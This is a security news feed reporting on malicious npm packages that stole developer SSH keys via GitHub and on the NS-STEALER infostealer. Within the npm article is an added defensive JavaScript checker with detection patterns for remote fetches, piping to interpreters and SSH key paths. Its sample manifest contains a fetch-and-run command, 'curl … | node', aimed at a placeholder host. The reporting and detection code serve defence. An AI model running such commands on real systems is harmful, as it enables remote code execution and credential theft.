Exfiltrate – INDIA NEWS (https://www.indiavpn.org), News Blog feed, Tue, 23 Jan 2024 16:15:38 +0000

Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub
https://www.indiavpn.org/2024/01/23/malicious-npm-packages-exfiltrate-hundreds-of-developer-ssh-keys-via-github/
Tue, 23 Jan 2024 16:15:38 +0000

Jan 23, 2024 | Newsroom | Software Security / Supply Chain


Two malicious packages discovered on the npm package registry have been found to use GitHub as a drop point for Base64-encoded SSH keys stolen from the developer systems on which they were installed.

The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024.

Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k.

Both modules run a postinstall script after installation, which retrieves and executes two different JavaScript files.


While warbeast2000 attempts to access the private SSH key, kodiak2k looks for a key named “meow,” suggesting that the threat actor used a placeholder name during the early stages of development.

“This second stage malicious script reads the private SSH key stored in the id_rsa file located in the <homedir>/.ssh directory,” security researcher Lucija Valentić said. “It then uploads the Base64-encoded key to an attacker-controlled GitHub repository.”
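A defender-side check for the install-hook pattern described above, as an added example that is not code from the article or from ReversingLabs: it parses a package.json manifest and flags lifecycle hooks whose commands fetch and run remote code, touch SSH key paths, or Base64-encode data. The sample manifest and the URL in it are constructed placeholders.

```javascript
// Added example (not from the article or ReversingLabs): audit an npm package.json for
// install-time lifecycle hooks that fetch and run remote code, the pattern the reported
// warbeast2000/kodiak2k packages used. No third-party modules are needed.

// npm runs these hooks automatically during `npm install` unless --ignore-scripts is set.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators: [label, regex]. A hit is a lead for review, not proof of malice.
const INDICATORS = [
  ['remote-fetch', /\b(curl|wget|fetch\(|https?:\/\/)/i],        // pulls a second stage
  ['pipe-to-interpreter', /\|\s*(node|sh|bash)\b/i],              // runs what it pulled
  ['eval-or-exec', /\b(node\s+-e|eval\(|child_process|exec\()/i], // dynamic execution
  ['ssh-key-path', /\.ssh[\\/]|id_rsa|id_ed25519/i],              // credential access
  ['base64', /\bbase64\b|toString\(['"]base64['"]\)/i],           // encoding before exfil
];

// Returns one record per lifecycle hook present, with the indicator labels that matched.
function auditManifest(manifestJson) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const indicators = INDICATORS.filter(([, re]) => re.test(command)).map(([label]) => label);
    findings.push({ hook, command, indicators });
  }
  return findings;
}

// Only the hooks that tripped at least one indicator.
function riskyHooks(manifestJson) {
  return auditManifest(manifestJson).filter((f) => f.indicators.length > 0);
}

// Constructed sample manifest mimicking the reported pattern: a postinstall hook that
// downloads a second-stage script and pipes it into node. The URL is a placeholder.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-pkg',
  version: '1.0.0',
  scripts: {
    postinstall: 'curl -s https://example.invalid/stage2.js | node',
    test: 'jest',
  },
});

console.log(JSON.stringify(riskyHooks(SAMPLE_MANIFEST), null, 2));
```

Running the check in CI before `npm install`, or installing with `--ignore-scripts` and reviewing flagged hooks by hand, keeps a hook like the one above from executing unnoticed.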

Subsequent versions of kodiak2k were found to execute a script found in an archived GitHub project hosting the Empire post-exploitation framework. The script is capable of launching the Mimikatz hacking tool to dump credentials from process memory.

“The campaign is just the latest example of cybercriminals and malicious actors using open source package managers and related infrastructure to support malicious software supply chain campaigns that target development organizations and end-user organizations,” Valentić said.

NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers
https://www.indiavpn.org/2024/01/22/ns-stealer-uses-discord-bots-to-exfiltrate-your-secrets-from-popular-browsers/
Mon, 22 Jan 2024 12:14:24 +0000

Jan 22, 2024 | Newsroom | Browser Security / Cyber Threat

Cybersecurity researchers have discovered a new Java-based “sophisticated” information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.

The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.

The ZIP file contains a rogue Windows shortcut file (“Loader GAYve”) that acts as a conduit for deploying a malicious JAR file, which first creates a folder called “NS-<11-digit_random_number>” to store the harvested data.


Into this folder the malware then saves screenshots; cookies, credentials, and autofill data stolen from over two dozen web browsers; system information; a list of installed programs; Discord tokens; and Steam and Telegram session data. The captured information is then exfiltrated to a Discord bot channel.

“Considering the highly sophisticated function of gathering sensitive information and using X509Certificate for supporting authentication, this malware can quickly steal information from the victim systems with [Java Runtime Environment],” Ramanathan said.

“The Discord bot channel as an EventListener for receiving exfiltrated data is also cost-effective.”

The development comes as the threat actors behind the Chaes (aka Chae$) malware have released an update (version 4.1) to the information stealer with improvements to its Chronod module, which is responsible for pilfering login credentials entered in web browsers and intercepting crypto transactions.


Infection chains distributing the malware, per Morphisec, use legal-themed email lures written in Portuguese to trick recipients into clicking bogus links; the links deliver a malicious installer that activates Chae$ 4.1.

In an interesting twist, the developers also left messages directly within the source code for security researcher Arnold Osipov, who has extensively analyzed Chaes in the past, expressing gratitude for helping them improve their “software.”
